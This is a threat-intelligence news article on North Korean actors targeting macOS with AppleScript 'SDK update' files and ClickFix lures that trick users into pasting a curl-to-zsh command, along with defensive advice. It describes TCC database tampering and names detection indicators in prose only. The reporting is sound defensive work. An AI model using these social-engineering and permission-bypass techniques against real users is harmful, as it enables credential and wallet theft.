North Korean Hackers Use AppleScript and ClickFix on macOS
An update on the macOS ClickFix threat: North Korean actors Sapphire Sleet and UNC1069 are now deploying AppleScript-based delivery chains and "Terminal-paste" lures to steal crypto-wallets and credentials from enterprise targets.
SEOUL, SOUTH KOREA — The "ClickFix" social engineering phenomenon has officially evolved into a targeted nation-state weapon. Recent intelligence from Microsoft and Mandiant confirms that North Korean-linked actors are now aggressively targeting macOS environments within the fintech, crypto, and healthcare sectors. By pivoting from generic web lures to sophisticated AppleScript-based delivery chains, groups like Sapphire Sleet are bypassing traditional macOS notarization and Gatekeeper controls by tricking users into manually authorizing the infection.
This campaign represents a significant escalation of the tactics we first identified in The ClickFix Trap: How Mac Users Are Being Tricked Into Hacking Themselves, moving from opportunistic web-browser scams to high-precision state espionage.
The Attack: User-Initiated Execution
The core of this campaign is a "fake technical issue" encountered during a high-pressure recruitment or video meeting. Unlike Windows-focused ClickFix attacks that rely on clipboard-hijacking, this macOS variant uses native system capabilities to gain persistence. The macOS variant uses two primary paths:
1. The AppleScript "SDK Update"
Used by Sapphire Sleet, this path delivers a compiled AppleScript file (Zoom SDK Update.scpt) masquerading as a critical video fix. When the user opens the file, it defaults to Script Editor. The attacker then persuades the user to click the "Run" button. This launches a multi-stage chain that modifies the TCC (Transparency, Consent, and Control) database to gain permissions silently, effectively granting the malware "Total Disk Access" without a standard system prompt.
2. The ClickFix Terminal Lure
Actors like UNC1069 use hijacked LinkedIn accounts to invite targets to fake technical interviews. When "connection issues" arise, the victim is prompted to copy a command (typically a curl | zsh pipeline) and paste it into the Terminal. This downloads the "Mach-O Man" binary, which operates as a persistent information stealer targeting browser sessions and wallet seeds stored in local application support folders.
What to Do Now: Immediate Actions
- Block Unsigned Scripts: Use MDM (Jamf, Kandji, Intune) to restrict the execution of
.scptand.applescriptfiles that are not notarized by your organization. - Terminal Paste Protection: Educate users on the "New macOS Terminal Warning," which alerts users when multi-line commands containing
curlorsudoare pasted into the Terminal app. - Audit TCC Modifications: Monitor for unauthorized movements or renames of
~/Library/Application Support/com.apple.TCC/TCC.db, a common indicator of Sapphire Sleet activity attempting to grant itself permissions. - Hardware MFA: Transition high-value accounts (crypto-exchanges, GitHub, Cloud Consoles) to FIDO2 hardware keys (Yubikey) to mitigate the impact of stolen session cookies.
The CyberSignal Analysis: Strategic Signals
Signal 01 — macOS as the High-Value Frontier
North Korea is no longer testing the waters; they are diving deep into macOS. As high-revenue developers and crypto-traders shift to Mac-only fleets, groups like BlueNoroff have built specialized malware stacks specifically to harvest macOS Keychain and wallet data. This highlights a critical oversight in many corporate security models that view macOS as "inherently safer" than Windows.
Signal 02 — The Trust-as-a-Service Vulnerability
The "ClickFix" vector proves that social engineering is now a native system utility. By leveraging the user's familiarity with "fixing audio issues" or "updating tools," attackers move execution into a user-authorized context, rendering traditional Gatekeeper and Notarization protections moot. The attack succeeds not because of a bug in the code, but a bug in human trust.
Signal 03 — The Supply Chain Pivot
Recent North Korean activity includes poisoning the widely-used axios NPM package to deliver the WAVESHAPER backdoor. This indicates a dual-track strategy: targeting individual high-value users via social engineering while simultaneously seeding the broader development ecosystem with malicious dependencies to facilitate lateral movement across cloud environments.
